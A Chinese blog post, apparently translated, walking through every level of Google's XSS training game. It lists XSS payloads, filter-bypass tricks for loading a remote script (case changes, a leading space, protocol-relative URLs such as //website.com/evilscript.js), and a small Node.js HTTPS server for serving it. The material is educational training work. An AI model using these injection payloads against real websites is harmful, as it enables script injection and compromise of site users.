时间: 2020-10-10|tag: 23次围观|0 条评论

Hi基友们,本文主要描述Google前些天发布的关于XSS漏洞游戏的玩法,地址在 这里。
本文我会列举在网络中找到的一些有趣的方法,包含所有关卡。废话不多说,直接开始吧!
Level 1: Hello, world of XSS
好吧,这一关很简单,没什么可说的:
<script>alert(1);</script> Level 2: Persistence is key
这一关可以用以下这几种不同的方式:
<a href="test" onclick="javascript:alert(1);">test</a> 创建一个链接(需要与用户交互)
<img src="test.png" onerror="javascript:alert(1);"/> 加载一幅无效图片(使用onerror)——不需要交互。
<img src=http://www.2cto.com/uploadfile/2014/0609/20140609091919258.png"onload="alert(1);" /> 加载一张有效图片(使用onload)——不需要交互。
Level 3: That sinking feeling
页面上加载的图片使用了window.location.hash 这一javascript属性。
所以我们可以用如下这种方式:
1.jpg' onload='javascript:alert(1);' 加载一张有效图片(使用onload)——不需要交互。
或者:
' onerror="alert(1)"> 加载一张无效图片(使用onerror)——不需要交互。
也可以用如下方式使用script 标签:
'><script>alert(1);</script> Level 4: Context matters
这一关需要用一些不同的方法:
1')%3Balert('1 分号字符必须被编码,否则会被过滤。
单引号’也有可能被过滤:
1%27)%3balert(%271 也可以使用||逻辑操作符:
1') || alert('1 也可以用下面这种方法,不需要任何编码/操作符:
1');alert(1);// Level 5: Breaking protocol
在这一关,像双引号”这样的字符会被过滤,我们只需要使用:
javascript:alert(1); 之后,单击链接之后,就会提示alert警告框了。
Level 6: Follow the rabbit
在最后一关,我们可以用如下方式使用data:text/javascript:
data:text/javascript,alert(1); 正则表达式也是大小写敏感的,所以我们可以用“HTTP”代替“http”,之后用如下这种方式加载远程脚本:
HTTP://127.0.0.1:8000 或在网址最开始处添加一个空格:
[空格]http://127.0.0.1:8000 首页必须包含一些类似alert(1)这样的javascript脚本。
我在网络上看到有些人没办法加载某些HTTP脚本,因为他们使用的是HTTPS版本,这种情况下,可以自己创建一个简单的HTTPS服务器(例如使用Node.js)。

var https = require('https');
var fs = require('fs');
 
var hskey = fs.readFileSync('server.key');
var hscert = fs.readFileSync('server.crt')
 
var options = {
    key: hskey,
    cert: hscert
};
 
https.createServer(options, function (req, res){
    res.writeHead(200);
    res.end("alert(1);");
}).listen(8000);

利用Node.js实现简单的HTTPS服务器
在这两种情况下,可以使用以下代码绕过过滤:
//website.com/evilscript.js 双反斜杠符号//是使用https或http的另一种方式,实际情况中会用哪个取决于网站使用的协议。
例如,如果运行着自己的HTTPS服务器,可以注入以下代码:
//127.0.0.1:8000 Done.
希望读完本文的读者能有所收获。这个游戏还是挺有意思的,期待其后续的作品。
原文地址:http://paulsec.github.io/blog/2014/06/02/diving-into-xss-googles-game/
 
 

    上一篇: 顺丰速运某分站点HTTP头部注入 - 网站安全 - 自学

    下一篇: 顺丰速运某分站注入漏洞 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《玩转Google的XSS游戏 – 网站安全 – 自学php
   

还没有人抢沙发呢~